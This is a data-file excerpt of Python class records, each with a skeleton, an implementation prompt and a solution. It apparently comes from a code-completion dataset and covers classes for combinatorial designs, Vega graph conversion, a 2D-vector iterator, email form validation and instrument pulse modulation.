order `v` is a triple `(V,\\\\mathcal G,\\\\mathcal B)` where: - `V` is a set of cardinality `v` - `\\\\mathcal G` is a partition of `V` into groups whose size belongs to `G` - `\\\\mathcal B` is a family of subsets of `V` whose size belongs to `K` such that any two points `p_1,p_2\\\\in V` from different groups appear simultaneously in exactly `\\\\lambda` elements of `\\\\mathcal B`. Besides, a group and a block intersect on at most one point. If `K=\\\\{k_1,...,k_l\\\\}` and `G` has exactly `m_i` groups of cardinality `k_i` then `G` is said to\"\"\"\n\n def __init__(self, points, groups, blocks, G=None, K=None, lambd=1, check=True, copy=True, **kwds):\n \"\"\"Constructor function EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n from .designs_pyx import is_group_divisible_design\n self._lambd = lambd\n IncidenceStructure.__init__(self, points, blocks, copy=copy, check=False, **kwds)\n if groups is None or (copy is False and self._point_to_index is None):\n self._groups = groups\n elif self._point_to_index is None:\n self._groups = [g[:] for g in groups]\n else:\n self._groups = [[self._point_to_index[x] for x in g] for g in groups]\n if check or groups is None:\n is_gdd = is_group_divisible_design(self._groups, self._blocks, self.num_points(), G, K, lambd, verbose=1)\n assert is_gdd\n if groups is None:\n self._groups = is_gdd[1]\n\n def groups(self):\n \"\"\"Return the groups of the Group-Divisible Design. EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/combinat/designs/group_divisible_designs.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "884b86e1c63265020f9e0eb79cf147ec697ffe39", "bodies": ["self.conditions_dict = conditions_dict\nself.axes_vars = axes_vars\nself.x_axis_label = labels['x_axis']\nself.y_axis_label = labels['y_axis']\nsuper(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\nself.graph_type = 'barbase'", "pandas_df = super(VegaGraphBarBase, self).parse_jsons()\ndf_restricted = pandas_df\nfor key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\ndf_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\ndf_restricted = df_restricted.reset_index()\nbar = self.read_config()\nbar['data'] = {'values': df_restricted.to_dict(orient='records')}\nbar['encoding']['y']['field'] = self.axes_vars['y']\nbar['encoding']['y']['axis'] = {'title': self.y_axis_label}\nfor key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\nbar['encoding']['x']['field'] = self.axes_vars['x']\nbar['encoding']['x']['axis'] = {'title': self.x_axis_label}\nreturn bar"], "bodies_text": "<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "class_docstring": "Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the", "class_name": "VegaGraphBarBase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000054", "length_bytes": 16246, "license_type": "no_license", "methods": [{"docstring": "Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.", "name": "__init__", "signature": "def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars)"}, {"docstring": "Parses the input json files using Pandas. Returns: the json file to be written to file.", "name": "parse_jsons", "signature": "def parse_jsons(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002102", "prompt": "Implement the Python class `VegaGraphBarBase` described below.\n\nClass description:\nClass for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\n\nMethod signatures and docstrings:\n- def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars): Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\n- def parse_jsons(self): Parses the input json files using Pandas. Returns: the json file to be written to file.", "prompted_full_text": "Implement the Python class `VegaGraphBarBase` described below.\n\nClass description:\nClass for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\n\nMethod signatures and docstrings:\n- def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars): Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\n- def parse_jsons(self): Parses the input json files using Pandas. Returns: the json file to be written to file.\n\n<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "revision_id": "d42ec8e8328117d70fb910f2d1f751ce15862810", "skeleton": "<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n", "source": "the_stack_v2_python_sparse", "source_path": "scripts/json2vega.py", "source_repo": "gunrock/io", "split": "test", "star_events_count": 11} {"blob_id": "8449739dd0f1e7fe6916a3dcc5d2939d5042bd6d", "bodies": ["Animal.__init__(self, habitat)\nMammal.__init__(self, food, fur)\nself.age = age\nself.sex = sex\nprint('---A Human---')", "print(f'\\nAge: {self.age}')\nprint(f'Sex: {self.sex}')\nprint(f'Habitat: {self.habitat}')\nprint(f'Food: {self.food}')\nprint(f'Fur: {self.fur}\\n')"], "bodies_text": "<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "class_docstring": "Human class. Args: age (int): Age of the human. sex (str): Sex of the human.", "class_name": "Human", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000055", "length_bytes": 2135, "license_type": "no_license", "methods": [{"docstring": "Constructor of Human class.", "name": "__init__", "signature": "def __init__(self, age, sex, habitat, food, fur=False)"}, {"docstring": "Display method to print the different characteristics.", "name": "display", "signature": "def display(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005644", "prompt": "Implement the Python class `Human` described below.\n\nClass description:\nHuman class. Args: age (int): Age of the human. sex (str): Sex of the human.\n\nMethod signatures and docstrings:\n- def __init__(self, age, sex, habitat, food, fur=False): Constructor of Human class.\n- def display(self): Display method to print the different characteristics.", "prompted_full_text": "Implement the Python class `Human` described below.\n\nClass description:\nHuman class. Args: age (int): Age of the human. sex (str): Sex of the human.\n\nMethod signatures and docstrings:\n- def __init__(self, age, sex, habitat, food, fur=False): Constructor of Human class.\n- def display(self): Display method to print the different characteristics.\n\n<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "revision_id": "892d9c25b9712bf3bbfd7f29529eca8b47fb8039", "skeleton": "<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n", "source": "the_stack_v2_python_sparse", "source_path": "sem-3/practical_26_Nov.py", "source_repo": "B-Tech-AI-Python/Class-assignments", "split": "test", "star_events_count": 0} {"blob_id": "f37b5c32a812d5101b89c304aa72b5a7cd677016", "bodies": ["self.row = 0\nself.col = 0\nself.vec2d = vec2d", "result = self.vec2d[self.row][self.col]\nself.col += 1\nreturn result", "while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\nreturn False"], "bodies_text": "<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Vector2D", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000056", "length_bytes": 867, "license_type": "permissive", "methods": [{"docstring": "Initialize your data structure here. :type vec2d: List[List[int]]", "name": "__init__", "signature": "def __init__(self, vec2d)"}, {"docstring": ":rtype: int", "name": "next", "signature": "def next(self)"}, {"docstring": ":rtype: bool", "name": "hasNext", "signature": "def hasNext(self)"}], "n_methods": 3, "prompt": "Implement the Python class `Vector2D` described below.\n\nClass description:\nImplement the Vector2D class.\n\nMethod signatures and docstrings:\n- def __init__(self, vec2d): Initialize your data structure here. :type vec2d: List[List[int]]\n- def next(self): :rtype: int\n- def hasNext(self): :rtype: bool", "prompted_full_text": "Implement the Python class `Vector2D` described below.\n\nClass description:\nImplement the Vector2D class.\n\nMethod signatures and docstrings:\n- def __init__(self, vec2d): Initialize your data structure here. :type vec2d: List[List[int]]\n- def next(self): :rtype: int\n- def hasNext(self): :rtype: bool\n\n<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "revision_id": "2cb4b45dd14a230aa0e800042e893f8dfb23beda", "skeleton": "<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Vector2D:\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "MY_REPOS/INTERVIEW-PREP-COMPLETE/Leetcode/251.py", "source_repo": "bgoonz/UsefulResourceRepo2.0", "split": "test", "star_events_count": 10} {"blob_id": "d482198d2918ff18e254e2be319fa6ce6e5e1274", "bodies": ["if not value:\n return []\nif isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\nelse:\n return value", "super(MultiEmailField, self).validate(value)\nfor email in value:\n validate_email(email)"], "bodies_text": "<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MultiEmailField", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000057", "length_bytes": 3815, "license_type": "permissive", "methods": [{"docstring": "Normalize data to a list of strings.", "name": "to_python", "signature": "def to_python(self, value)"}, {"docstring": "Check if value consists only of valid emails.", "name": "validate", "signature": "def validate(self, value)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000258", "prompt": "Implement the Python class `MultiEmailField` described below.\n\nClass description:\nImplement the MultiEmailField class.\n\nMethod signatures and docstrings:\n- def to_python(self, value): Normalize data to a list of strings.\n- def validate(self, value): Check if value consists only of valid emails.", "prompted_full_text": "Implement the Python class `MultiEmailField` described below.\n\nClass description:\nImplement the MultiEmailField class.\n\nMethod signatures and docstrings:\n- def to_python(self, value): Normalize data to a list of strings.\n- def validate(self, value): Check if value consists only of valid emails.\n\n<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "revision_id": "aeaae292fbd55aca1b6043227ec105e67d73367f", "skeleton": "<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiEmailField:\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n", "source": "the_stack_v2_python_sparse", "source_path": "ietf/utils/fields.py", "source_repo": "omunroe-com/ietfdb2", "split": "test", "star_events_count": 2} {"blob_id": "0da743e9fd2ee531cf516f7f91c5835232851ffa", "bodies": ["test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\nif test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\nreturn (test, traceback)", "if switch is None:\n switch = self.format_and_eval_string(self.switch)\nif switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\nelse:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)"], "bodies_text": "<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "class_docstring": "Switch on/off the pulse modulation of the source.", "class_name": "SetPulseModulationTask", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n 